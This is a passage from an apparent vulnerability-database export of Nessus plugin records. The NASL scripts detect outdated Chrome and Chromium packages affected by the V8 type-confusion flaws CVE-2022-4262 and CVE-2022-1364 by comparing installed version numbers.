Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 108.0.5359.94. It is, therefore, affected by\na vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11d8a245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1394403\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 108.0.5359.94 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'108.0.5359.94', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:58:14", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2022:10236-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-09T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10236-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "cpe:/o:novell:opensuse:15.3", "cpe:/o:novell:opensuse:15.4"], "id": "OPENSUSE-2022-10236-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168539", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10236-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168539);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n\n script_name(english:\"openSUSE 15 Security Update : chromium (openSUSE-SU-2022:10236-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10236-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1205999\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/HYWSKXQCLKUA2XSRYX5WQISODN4DQ3PR/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abb37f45\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-4262\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromedriver and / or chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.3|SUSE15\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3 / 15.4', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromedriver-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'aarch64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'chromium-108.0.5359.94-bp154.2.52.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromedriver / chromium');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 2899da38-7300-11ed-92ce-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-03T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- Type confusion in V8 (2899da38-7300-11ed-92ce-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2899DA38730011ED92CE3065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/168387", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168387);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"FreeBSD : chromium -- Type confusion in V8 (2899da38-7300-11ed-92ce-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 2899da38-7300-11ed-92ce-3065ec8fd3ec advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11d8a245\");\n # https://vuxml.freebsd.org/freebsd/2899da38-7300-11ed-92ce-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?951eb4c0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<108.0.5359.94',\n 'ungoogled-chromium<108.0.5359.94'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5295 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-05T00:00:00", "type": "nessus", "title": "Debian DSA-5295-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5295.NASL", "href": "https://www.tenable.com/plugins/nessus/168400", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5295. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168400);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"Debian DSA-5295-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5295\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-4262\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 108.0.5359.94-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-4262\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '108.0.5359.94-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '108.0.5359.94-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:51", "description": "The version of Google Chrome installed on the remote Windows host is prior to 100.0.4896.127. It is, therefore, affected by a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 100.0.4896.127 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_100_0_4896_127.NASL", "href": "https://www.tenable.com/plugins/nessus/159741", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159741);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n\n script_name(english:\"Google Chrome < 100.0.4896.127 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 100.0.4896.127. It is, therefore, affected\nby a vulnerability as referenced in the 2022_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d51f41d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1315901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 100.0.4896.127 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'100.0.4896.127', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:51", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the a25ea27b-bced-11ec-87b5-3065ec8fd3ec advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-15T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (a25ea27b-bced-11ec-87b5-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A25EA27BBCED11EC87B53065EC8FD3EC.NASL", "href": 